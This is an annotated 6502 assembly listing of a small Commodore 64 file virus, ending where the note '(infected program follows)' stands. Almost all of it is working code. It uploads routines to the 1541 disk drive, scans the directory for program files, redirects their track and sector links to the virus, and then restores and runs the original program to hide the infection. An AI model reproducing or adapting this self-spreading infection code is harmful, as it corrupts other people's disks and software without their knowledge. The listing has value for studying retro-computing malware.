; basic stub
0801	.byte $0c,$08,$c9,$07,$9e,$ff,$ac,$36,$35,$36,$00

; send drivecode
; move copyloop to stack
; start drivecode
; start copyloop

start:
.C:080c   A0 00      LDY #$00

.C:080e   8C 7F 08   STY $087F
.C:0811   20 3B 08   JSR $083B		; M-W $0500
.C:0814   AA         TAX

.C:0815   B9 FD 07   LDA $07FD,Y
.C:0818   20 DD ED   JSR $EDDD
.C:081b   C8         INY
.C:081c   CA         DEX
.C:081d   D0 F6      BNE $0815

.C:081f   AA         TAX
.C:0820   20 AE FF   JSR $FFAE
.C:0823   98         TYA
.C:0824   D0 E8      BNE $080E

.C:0826   8E 80 08   STX $0880		; change the M-W to M-E $0500

.C:0829   BD 51 08   LDA $0851,X
.C:082c   9D 00 01   STA $0100,X
.C:082f   CA         DEX
.C:0830   10 F7      BPL $0829

.C:0832   20 3B 08   JSR $083B		; M-E
.C:0835   20 AE FF   JSR $FFAE
.C:0838   4C 00 01   JMP $0100

; send M-W
.C:083b   A9 08      LDA #$08
.C:083d   20 0C ED   JSR $ED0C
.C:0840   A9 6F      LDA #$6F
.C:0842   20 B9 ED   JSR $EDB9
.C:0845   A2 05      LDX #$05

.C:0847   BD 7D 08   LDA $087D,X
.C:084a   20 DD ED   JSR $EDDD
.C:084d   CA         DEX
.C:084e   10 F7      BPL $0847
.C:0850   60         RTS

; originally at $0851
; transfered to $0100

; copies original program back to
; where it belongs and runs it

.C:0851   78         SEI
.C:0852   E6 01      INC $01
.C:0854   BD 00 08   LDA $0800,X
.C:0857   9D 02 07   STA $0702,X
.C:085a   E8         INX
.C:085b   D0 F7      BNE $0854

.C:085d   EE 08 01   INC $0108
.C:0860   EE 05 01   INC $0105
.C:0863   D0 EF      BNE $0854

.C:0865   A5 2D      LDA $2D
.C:0867   38         SEC
.C:0868   E9 FE      SBC #$FE
.C:086a   85 2D      STA $2D
.C:086c   85 AE      STA $AE
.C:086e   B0 04      BCS $0874
.C:0870   C6 2E      DEC $2E
.C:0872   C6 AF      DEC $AF
.C:0874   C6 01      DEC $01
.C:0876   58         CLI
.C:0877   20 59 A6   JSR $A659
.C:087a   4C AE A7   JMP $A7AE

087d	.byte $20,$05,$e0,"W","-","M"

; drivecode
.C:0883   85 14      STA $14
.C:0885   85 07      STA $07
.C:0887   A9 B0      LDA #$B0
.C:0889   20 D9 05   JSR $05D9
.C:088c   A9 80      LDA #$80
.C:088e   20 D9 05   JSR $05D9
.C:0891   A0 01      LDY #$01
.C:0893   B1 14      LDA ($14),Y
.C:0895   29 8F      AND #$8F
.C:0897   C9 82      CMP #$82
.C:0899   F0 0F      BEQ $08AA
.C:089b   A5 14      LDA $14
.C:089d   18         CLC
.C:089e   69 20      ADC #$20
.C:08a0   85 14      STA $14
.C:08a2   90 ED      BCC $0891
.C:08a4   AD 01 03   LDA $0301
.C:08a7   10 DC      BPL $0885
.C:08a9   60         RTS

.C:08aa   C8         INY
.C:08ab   B1 14      LDA ($14),Y
.C:08ad   C9 13      CMP #$13
.C:08af   F0 EA      BEQ $089B
.C:08b1   8D 00 05   STA $0500
.C:08b4   A9 13      LDA #$13
.C:08b6   91 14      STA ($14),Y
.C:08b8   85 0A      STA $0A
.C:08ba   C8         INY
.C:08bb   B1 14      LDA ($14),Y
.C:08bd   8D 01 05   STA $0501
.C:08c0   A9 11      LDA #$11
.C:08c2   91 14      STA ($14),Y
.C:08c4   85 0B      STA $0B
.C:08c6   A8         TAY
.C:08c7   88         DEY
.C:08c8   10 02      BPL $08CC
.C:08ca   A0 12      LDY #$12
.C:08cc   8C C4 05   STY $05C4
.C:08cf   20 D7 05   JSR $05D7
.C:08d2   A2 05      LDX #$05
.C:08d4   A9 90      LDA #$90
.C:08d6   95 FD      STA $FD,X
.C:08d8   B5 FD      LDA $FD,X
.C:08da   30 FC      BMI $08D8
.C:08dc   60         RTS

.C:08dd   A2 03      LDX #$03
.C:08df   86 15      STX $15
.C:08e1   8E 00 18   STX $1800
.C:08e4   A9 12      LDA #$12
.C:08e6   85 06      STA $06
.C:08e8   A9 08      LDA #$08
.C:08ea   8D 03 05   STA $0503
.C:08ed   2C 00 18   BIT $1800
.C:08f0   10 FB      BPL $08ED
.C:08f2   20 18 C1   JSR $C118
.C:08f5   A9 01      LDA #$01
.C:08f7   8D 02 05   STA $0502
.C:08fa   D0 87      BNE $0883

.C:08fc   45 01      EOR $01

(infected program follows)